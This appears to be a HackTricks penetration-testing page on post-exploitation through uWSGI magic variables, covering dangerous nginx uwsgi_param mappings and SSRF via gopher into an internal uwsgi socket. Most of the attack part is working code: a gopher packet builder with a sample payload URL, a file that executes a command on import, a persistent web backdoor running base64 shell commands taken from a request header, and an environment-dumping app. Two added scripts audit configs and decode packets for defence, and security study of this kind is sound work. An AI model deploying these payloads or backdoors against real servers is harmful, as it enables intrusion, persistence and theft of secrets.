WSGI Post-Exploitation Tricks
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
WSGI Overview
The Web Server Gateway Interface (WSGI) is a specification that describes how a web server communicates with web applications, and how web applications can be chained together to process a single request. uWSGI is one of the most popular WSGI servers, often used to serve Python web applications. Its native binary transport is the uwsgi protocol (lowercase), which carries a bag of key/value parameters ("uwsgi params") to the backend application server.
Related pages you may also want to check:
SSRF (Server Side Request Forgery)
uWSGI Magic Variables Exploitation
uWSGI provides special "magic variables" that can change how an instance loads and routes applications. These variables are not regular HTTP headers; they are uwsgi parameters passed inside the uwsgi/SCGI/FastCGI request from the reverse proxy (nginx, Apache mod_proxy_uwsgi, etc.) to the uWSGI backend. If the proxy configuration places user-controlled data into uwsgi parameters (for example via $arg_*, $http_*, or insecurely exposed endpoints that speak the uwsgi protocol), attackers can set these variables and achieve code execution.
Dangerous mappings in front proxies (e.g. nginx)
Misconfigurations like the following directly expose uWSGI magic variables to user input:
```nginx
location /app/ {
    include uwsgi_params;
    # DANGEROUS: maps query args and request headers into uwsgi params
    uwsgi_param UWSGI_FILE $arg_f;          # /app/?f=/tmp/backdoor.py
    uwsgi_param UWSGI_MODULE $http_x_mod;   # header: X-Mod: pkg.mod
    uwsgi_param UWSGI_CALLABLE $arg_c;      # /app/?c=application
    uwsgi_pass unix:/run/uwsgi/app.sock;
}
```
If the app or an upload feature allows writing a file to a predictable path, combining it with the mappings above usually results in immediate RCE once the backend loads the attacker-controlled file/module.
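As an added defender-side check (not code from the original page or from the uWSGI project), this Python audit scans an nginx configuration for uwsgi_param directives that map one of the magic variables above onto a client-controlled nginx variable such as $arg_* or $http_*; the sample configuration is constructed from the block above, with one static mapping added that must not be flagged. The fix it points at is the one the page implies: magic variables, where needed at all, get fixed values only.

```python
import re

# uwsgi params that change what uWSGI loads or executes (the magic variables on this page).
MAGIC_PARAMS = {"UWSGI_FILE", "UWSGI_SCRIPT", "UWSGI_MODULE", "UWSGI_CALLABLE",
                "UWSGI_SETENV", "UWSGI_PYHOME", "UWSGI_CHDIR"}

# nginx variables whose value comes straight from the client request.
CLIENT_CONTROLLED = re.compile(
    r"\$(?:arg_\w+|args|query_string|http_\w+|cookie_\w+|request_uri|uri|request_body)\b")

# One uwsgi_param directive per line: name, then value, up to the ';'.
PARAM_DIRECTIVE = re.compile(r"^[ \t]*uwsgi_param[ \t]+(\S+)[ \t]+([^;]+);", re.M)

def audit_uwsgi_params(conf: str) -> list:
    """Return (param_name, value, line_no) for every magic variable whose value
    contains a client-controlled nginx variable."""
    findings = []
    for m in PARAM_DIRECTIVE.finditer(conf):
        name, value = m.group(1), m.group(2).strip()
        if name in MAGIC_PARAMS and CLIENT_CONTROLLED.search(value):
            line_no = conf.count("\n", 0, m.start()) + 1
            findings.append((name, value, line_no))
    return findings

# Constructed sample: the dangerous block from above plus one static mapping
# (UWSGI_SCRIPT with a fixed module path) that a correct audit must not flag.
SAMPLE_CONF = """\
location /app/ {
    include uwsgi_params;
    uwsgi_param UWSGI_FILE $arg_f;
    uwsgi_param UWSGI_MODULE $http_x_mod;
    uwsgi_param UWSGI_CALLABLE $arg_c;
    uwsgi_param UWSGI_SCRIPT myapp.wsgi:application;
    uwsgi_pass unix:/run/uwsgi/app.sock;
}
"""

if __name__ == "__main__":
    for name, value, line_no in audit_uwsgi_params(SAMPLE_CONF):
        print(f"line {line_no}: {name} <- {value} (client-controlled; use a static value or drop it)")
```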
Key Exploitable Variables
UWSGI_FILE - Load/execute an arbitrary file
```nginx
uwsgi_param UWSGI_FILE /path/to/python/file.py;
```
Loads and executes an arbitrary Python file as the WSGI application. If an attacker can control this parameter through the uwsgi param bag, they can achieve Remote Code Execution (RCE).
UWSGI_SCRIPT - Script loading
```nginx
uwsgi_param UWSGI_SCRIPT module.path:callable;
uwsgi_param SCRIPT_NAME /endpoint;
```
Loads the specified script as a new application. Combined with the ability to upload or write files, this can lead to RCE.
UWSGI_MODULE and UWSGI_CALLABLE - Dynamic module loading
```nginx
uwsgi_param UWSGI_MODULE malicious.module;
uwsgi_param UWSGI_CALLABLE evil_function;
uwsgi_param SCRIPT_NAME /backdoor;
```
These parameters allow loading arbitrary Python modules and calling specific functions within them.
UWSGI_SETENV - Environment variable manipulation
```nginx
uwsgi_param UWSGI_SETENV DJANGO_SETTINGS_MODULE=malicious.settings;
```
Can be used to change environment variables, potentially altering application behaviour or loading malicious configuration.
UWSGI_PYHOME - Python environment override
```nginx
uwsgi_param UWSGI_PYHOME /path/to/malicious/venv;
```
Changes the Python virtual environment, potentially loading malicious packages or a different Python interpreter.
UWSGI_CHDIR - Directory changes
```nginx
uwsgi_param UWSGI_CHDIR /etc/;
```
Changes the working directory before handling requests and can be combined with other vectors.
SSRF + uwsgi protocol (gopher) pivot
Threat model
If the target web app has an SSRF primitive and a uWSGI instance listens on an internal TCP socket (for example, socket = 127.0.0.1:3031), you can speak the raw uwsgi protocol via gopher and inject uWSGI magic variables.
This is possible because many deployments use a non-HTTP uwsgi socket internally; the reverse proxy (nginx/Apache) translates the client's HTTP into the uwsgi param bag. With SSRF+gopher you can craft the uwsgi binary packet directly and set dangerous variables such as UWSGI_FILE.
uWSGI protocol structure (quick reference)
- Header (4 bytes): modifier1 (1 byte), datasize (2 bytes little-endian), modifier2 (1 byte)
- Body: a sequence of [key_len(2 LE)] [key_bytes] [val_len(2 LE)] [val_bytes]
For regular requests modifier1 is 0. The body contains uwsgi variables such as SERVER_PROTOCOL, REQUEST_METHOD, PATH_INFO, UWSGI_FILE, etc. See the official protocol spec for full details.
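Added example (not code from the original page or from the uWSGI project): a decoder for the packet layout just described that validates the header's datasize, walks the key/value body and reports any magic variables it carries, which is what a socket tap or proxy-side inspection would want to flag. The sample packet and the small encoder that builds it are constructed here.

```python
import struct

# uwsgi params that alter how uWSGI loads the application (the magic variables on this page).
MAGIC_VARS = {"UWSGI_FILE", "UWSGI_SCRIPT", "UWSGI_MODULE", "UWSGI_CALLABLE",
              "UWSGI_SETENV", "UWSGI_PYHOME", "UWSGI_CHDIR"}

def parse_uwsgi_packet(pkt: bytes) -> dict:
    """Decode one uwsgi packet: header modifier1(1) datasize(2 LE) modifier2(1),
    then a body of [klen(2 LE)][key][vlen(2 LE)][value] pairs.
    Raises ValueError on truncated or inconsistent input rather than guessing."""
    if len(pkt) < 4:
        raise ValueError("packet shorter than the 4-byte header")
    modifier1, datasize, modifier2 = struct.unpack("<BHB", pkt[:4])
    body = pkt[4:]
    if len(body) != datasize:
        raise ValueError(f"header datasize {datasize} != body length {len(body)}")
    params, pos = {}, 0
    while pos < datasize:
        fields = []
        for _ in range(2):  # key, then value
            if pos + 2 > datasize:
                raise ValueError("truncated length field")
            n = struct.unpack_from("<H", body, pos)[0]
            pos += 2
            if pos + n > datasize:
                raise ValueError("length field runs past the end of the body")
            fields.append(body[pos:pos + n].decode("latin-1"))
            pos += n
        params[fields[0]] = fields[1]
    return {"modifier1": modifier1, "modifier2": modifier2, "params": params}

def magic_vars_present(pkt: bytes) -> list:
    """Names of magic variables carried by the packet; a non-empty list means the
    request, not the server config, is choosing what uWSGI loads."""
    return sorted(k for k in parse_uwsgi_packet(pkt)["params"] if k in MAGIC_VARS)

def encode_uwsgi_params(params: dict) -> bytes:
    """Small encoder (modifier1 = 0) used only to construct the sample below."""
    body = b"".join(struct.pack("<H", len(k)) + k.encode() + struct.pack("<H", len(v)) + v.encode()
                    for k, v in params.items())
    return struct.pack("<BHB", 0, len(body), 0) + body

# Constructed sample packet: an ordinary request with an injected UWSGI_FILE.
SAMPLE_PKT = encode_uwsgi_params({"REQUEST_METHOD": "GET", "PATH_INFO": "/",
                                  "SERVER_PROTOCOL": "HTTP/1.1",
                                  "UWSGI_FILE": "/app/profiles/malicious.py"})
```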
Minimal packet builder (generate gopher payload)
```python
import struct, urllib.parse

def uwsgi_gopher_url(host, port, params):
    # Body: [key_len(2 LE)][key][val_len(2 LE)][val] for every param
    body = b''.join([struct.pack('<H', len(k)) + k.encode() + struct.pack('<H', len(v)) + v.encode()
                     for k, v in params.items()])
    # Header: modifier1 = 0, datasize (2 LE), modifier2 = 0
    pkt = bytes([0]) + struct.pack('<H', len(body)) + bytes([0]) + body
    # gopher sends the bytes after "/_" verbatim to the target socket
    return f"gopher://{host}:{port}/_" + urllib.parse.quote_from_bytes(pkt)

# Example URL:
# gopher://127.0.0.1:5000/_%00%D2%00%00%0F%00SERVER_PROTOCOL%08%00HTTP/1.1%0E%00REQUEST_METHOD%03%00GET%09%00PATH_INFO%01%00/%0B%00REQUEST_URI%01%00/%0C%00QUERY_STRING%00%00%0B%00SERVER_NAME%00%00%09%00HTTP_HOST%0E%00127.0.0.1%3A5000%0A%00UWSGI_FILE%1D%00/app/profiles/malicious.json%0B%00SCRIPT_NAME%10%00/malicious.json
```
Usage example to force-load a file previously written to the server:
```python
params = {
    'SERVER_PROTOCOL': 'HTTP/1.1', 'REQUEST_METHOD': 'GET', 'PATH_INFO': '/',
    'UWSGI_FILE': '/app/profiles/malicious.py', 'SCRIPT_NAME': '/malicious.py'
}
print(uwsgi_gopher_url('127.0.0.1', 3031, params))
```
Send the generated URL through the SSRF sink.
Worked example
If you can write a Python file to disk (the extension does not matter) with code such as:
```python
# /app/profiles/malicious.py
import os

# Runs at import time, i.e. as soon as uWSGI loads the file
os.system('/readflag > /app/profiles/result.txt')

def application(environ, start_response):
    start_response('200 OK', [('Content-Type', 'text/plain')])
    return [b'ok']
```
Build and trigger a gopher payload that sets UWSGI_FILE to this path. The backend will import and execute it as a WSGI app.
Post-Exploitation Techniques
1. Persistent Backdoors
File-based Backdoor
```python
# backdoor.py
import subprocess, base64

def application(environ, start_response):
    # Command arrives base64-encoded in the X-Cmd request header
    cmd = environ.get('HTTP_X_CMD', '')
    if cmd:
        result = subprocess.run(base64.b64decode(cmd), shell=True, capture_output=True, text=True)
        response = f"STDOUT: {result.stdout}\nSTDERR: {result.stderr}"
    else:
        response = 'Backdoor active'
    start_response('200 OK', [('Content-Type', 'text/plain')])
    return [response.encode()]
```
Load it via UWSGI_FILE and reach it under the SCRIPT_NAME you chose.
Environment-based Persistence
```nginx
uwsgi_param UWSGI_SETENV PYTHONPATH=/tmp/malicious:/usr/lib/python3.11/site-packages;
```
2. Information Disclosure
Environment Variable Dumping
```python
# env_dump.py
import os, json

def application(environ, start_response):
    env_data = {'os_environ': dict(os.environ), 'wsgi_environ': dict(environ)}
    start_response('200 OK', [('Content-Type', 'application/json')])
    # default=str: the WSGI environ holds non-JSON objects (wsgi.input, wsgi.errors, ...)
    return [json.dumps(env_data, indent=2, default=str).encode()]
```
File System Access
Combine UWSGI_CHDIR with a file-serving helper to browse sensitive directories.
3. Privilege Escalation ideas
- If uWSGI runs with elevated privileges and writes root-owned sockets/pids, abusing env and directory changes can help you place files with privileged owners or interfere with runtime state.
- Overriding settings via the environment (UWSGI_*) inside a file loaded via UWSGI_FILE can affect the process model and workers and make persistence stealthier.
```python
# malicious_config.py
import os

# Override uWSGI configuration through its UWSGI_* environment options
os.environ['UWSGI_MASTER'] = '1'
os.environ['UWSGI_PROCESSES'] = '1'
os.environ['UWSGI_CHEAPER'] = '1'
```
Reverse-proxy desync issues relevant to uWSGI chains (recent)
Deployments using Apache httpd with mod_proxy_uwsgi have been affected by recent response-splitting/desynchronization bugs that can affect the frontend↔backend translation layer:
- CVE-2023-27522 (Apache httpd 2.4.30–2.4.55; also related to the uWSGI integration before fixes in 2.0.22/2.0.26): crafted origin response headers can cause HTTP response smuggling when mod_proxy_uwsgi is used. Upgrading Apache to ≥2.4.56 mitigates the issue.
- CVE-2024-24795 (fixed in Apache httpd 2.4.59; uWSGI 2.0.26 changed its Apache integration): HTTP response splitting in several httpd modules can cause desync when backends contribute headers. In the uWSGI 2.0.26 changelog this appears as "let httpd handle CL/TE for non-http handlers."
These do not directly yield RCE in uWSGI, but in edge cases they can be chained with header injection or SSRF to pivot toward the uwsgi backend. During testing, fingerprint the proxy and its version and consider desync/smuggling primitives as a way into backend-only routes and sockets.
References
- uWSGI Magic Variables Documentation
- IOI SaveData CTF Writeup
- uWSGI Security Best Practices
- The uwsgi Protocol (spec)
- uWSGI 2.0.26 changelog mentioning CVE-2024-24795 adjustments